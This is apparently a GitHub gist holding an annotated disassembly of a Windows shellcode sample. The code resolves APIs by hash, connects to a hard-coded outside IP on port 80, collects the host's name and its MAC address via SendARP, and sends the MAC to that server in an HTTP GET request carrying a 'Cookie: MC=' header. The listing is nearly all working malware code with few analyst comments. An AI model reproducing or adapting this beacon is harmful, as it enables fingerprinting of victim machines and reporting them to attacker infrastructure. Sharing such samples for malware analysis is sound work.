Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
; Input SHA256 : 3A74FBDF96B5E73F930F5887A82E4008FFB8484AE180DD3F7DE7480BC5577345
; Input MD5 : 614D07EF7777CFF5CFDF741587A097DA
; Input CRC32 : B326AB6B
; ---------------------------------------------------------------------------
; File Name : D:\_anal_temp\shellcode2.bin
; Format : Binary file
; Base Address: 0000h Range: 0000h - 02FCh Loaded length: 02FCh
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
seg000 segment byte public 'CODE' use32
assume cs:seg000
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
cld
call sub_8F
; =============== S U B R O U T I N E =======================================
sub_6 proc near
var_4 = dword ptr -4
pusha
mov ebp, esp
xor edx, edx
mov edx, fs:[edx+30h]
mov edx, [edx+0Ch]
mov edx, [edx+14h]
loc_15: ; CODE XREF: sub_6+87j
mov esi, [edx+28h]
movzx ecx, word ptr [edx+26h]
xor edi, edi
loc_1E: ; CODE XREF: sub_6+26j
xor eax, eax
lodsb
cmp al, 61h ; 'a'
jl short loc_27
sub al, 20h ; ' '
loc_27: ; CODE XREF: sub_6+1Dj
ror edi, 0Dh
add edi, eax
loop loc_1E
push edx
push edi
mov edx, [edx+10h]
mov eax, [edx+3Ch]
add eax, edx
mov eax, [eax+78h]
test eax, eax
jz short loc_89
add eax, edx
push eax
mov ecx, [eax+18h]
mov ebx, [eax+20h]
add ebx, edx
loc_4A: ; CODE XREF: sub_6+60j
jecxz short loc_88
dec ecx
mov esi, [ebx+ecx*4]
add esi, edx
xor edi, edi
loc_54: ; CODE XREF: sub_6+58j
xor eax, eax
lodsb
ror edi, 0Dh
add edi, eax
cmp al, ah
jnz short loc_54
add edi, [ebp-8]
cmp edi, [ebp+24h]
jnz short loc_4A
pop eax
mov ebx, [eax+24h]
add ebx, edx
mov cx, [ebx+ecx*2]
mov ebx, [eax+1Ch]
add ebx, edx
mov eax, [ebx+ecx*4]
add eax, edx
mov [esp+28h+var_4], eax
pop ebx
pop ebx
popa
pop ecx
pop edx
push ecx
jmp eax
; ---------------------------------------------------------------------------
loc_88: ; CODE XREF: sub_6:loc_4Aj
pop eax
loc_89: ; CODE XREF: sub_6+37j
pop edi
pop edx
mov edx, [edx]
jmp short loc_15
sub_6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_8F proc near ; CODE XREF: seg000:00000001p
pop ebp
lea eax, [ebp+297h] ; ws2_32
push eax
push kernel32_LoadLibraryA_hash
call ebp
test eax, eax
jz loc_22B
lea eax, [ebp+29Eh] ; IPHLPAPI
push eax
push kernel32_LoadLibraryA_hash
call ebp
test eax, eax
jz loc_22B
mov ebx, 190h
sub esp, ebx
push esp
push ebx
push ws2_32_WSAStartup_hash
call ebp
add esp, ebx
test eax, eax
jnz loc_22B
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
push ws2_32_WSASocketA_hash
call ebp
xor ebx, ebx
not ebx
cmp ebx, eax
jz loc_22B
mov ebx, eax
loc_F3: ; CODE XREF: sub_8F+8Bj
push 0E21B2705h ; 5.39.27.226
push small 5000h ; 80
xor ecx, ecx
add cl, 2
push cx
mov edx, esp
push 10h
push edx
push ebx
push ws2_32_connect_hash
call ebp
test eax, eax
jz short loc_11C
dec byte ptr [ebp+248h]
jnz short loc_F3
loc_11C: ; CODE XREF: sub_8F+83j
mov eax, 100h
sub esp, eax
mov edx, esp
push edx
push eax
push edx
push ws2_32_gethostname_hash
call ebp
pop edi
add esp, 100h
test eax, eax
jnz loc_234
push edi
call get_str_len
pop esi
mov edx, ecx
lea edi, [ebp+2A7h] ; GET /0a821a80/05dc0212 HTTP/1.1
; Host:
call get_str_len
dec edi
cmp edx, 20h ; ' '
jl short loc_15D
mov edx, 20h ; ' '
loc_15D: ; CODE XREF: sub_8F+C7j
mov ecx, edx
push esi
rep movsb
mov ecx, 0Dh
lea esi, [ebp+28Ah] ; Cookie:
rep movsb
mov [ebp+244h], edi
pop esi
push esi
push ws2_32_gethostbyname_hash ; gets computername
call ebp
test eax, eax
jz loc_234
mov cx, [eax+0Ah]
cmp cx, 4
jb loc_234
lea eax, [eax+0Ch]
mov eax, [eax]
mov ecx, [eax]
mov ecx, [ecx]
mov eax, 100h
push eax
mov edi, esp
sub esp, eax
mov esi, esp
push edi
push esi
push ecx
push ecx
push IPHLPAPI_SendARP_hash
call ebp
test eax, eax
add esp, 104h
movzx ecx, word ptr [edi]
cmp ecx, 6
jb short loc_234
mov ecx, 6
mov eax, 10h
sub esp, eax
mov edi, esp
mov edx, ecx
shl edx, 1
push eax
push edx
loc_1D8: ; CODE XREF: sub_8F+173j
xor edx, edx
mov dl, [esi]
mov al, dl
and al, 0F0h
shr al, 4
cmp al, 9
ja short loc_1EB
add al, 30h ; '0'
jmp short loc_1ED
; ---------------------------------------------------------------------------
loc_1EB: ; CODE XREF: sub_8F+156j
add al, 37h ; '7'
loc_1ED: ; CODE XREF: sub_8F+15Aj
mov [edi], al
inc edi
mov al, dl
and al, 0Fh
cmp al, 9
ja short loc_1FC
add al, 30h ; '0'
jmp short loc_1FE
; ---------------------------------------------------------------------------
loc_1FC: ; CODE XREF: sub_8F+167j
add al, 37h ; '7'
loc_1FE: ; CODE XREF: sub_8F+16Bj
mov [edi], al
inc edi
inc esi
loop loc_1D8
pop ecx
sub edi, ecx
mov esi, edi
pop eax
add esp, eax
mov edi, [ebp+244h]
rep movsb
call mem_copy
xor eax, eax
push eax
push ecx
sub edi, ecx
dec edi
push edi
push ebx
push ws2_32_send_hash
call ebp
jmp short loc_234
; ---------------------------------------------------------------------------
loc_22B: ; CODE XREF: sub_8F+11j sub_8F+27j ...
push 0
push ntdll_RtlExitUserThread_hash
call ebp
loc_234: ; CODE XREF: sub_8F+A9j sub_8F+F1j ...
push ebx
push ws2_32_closesocket_hash
call ebp
jmp short loc_22B
sub_8F endp
; =============== S U B R O U T I N E =======================================
get_str_len proc near ; CODE XREF: sub_8F+B0p sub_8F+BEp ...
xor ecx, ecx
not ecx
xor eax, eax
repne scasb
not ecx
dec ecx
retn
get_str_len endp
; ---------------------------------------------------------------------------
align 4
db 2 dup(0), 3
; =============== S U B R O U T I N E =======================================
mem_copy proc near ; CODE XREF: sub_8F+185p
lea edi, [ebp+2A7h]
call get_str_len
dec edi
mov ecx, 4Fh ; 'O'
lea esi, [ebp+26Eh] ; Accept-Encoding: gzip
rep movsb
lea edi, [ebp+2A7h]
call get_str_len
retn
mem_copy endp
; ---------------------------------------------------------------------------
aAcceptEncoding db 0Dh,0Ah
db 'Accept-Encoding: gzip',0Dh,0Ah
db 0Dh,0Ah,0
db 0Dh
db 0Ah
aCookie db 'Cookie: '
aMc db 'MC='
aWs2_32 db 'ws2_32'
db 0
aIphlpapi db 'IPHLPAPI',0
aGet0a821a8005d db 'GET /0a821a80/05dc0212 HTTP/1.1',0Dh,0Ah
db 'Host: ',0
align 4
dd 8 dup(0)
dd 41900000h
seg000 ends
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment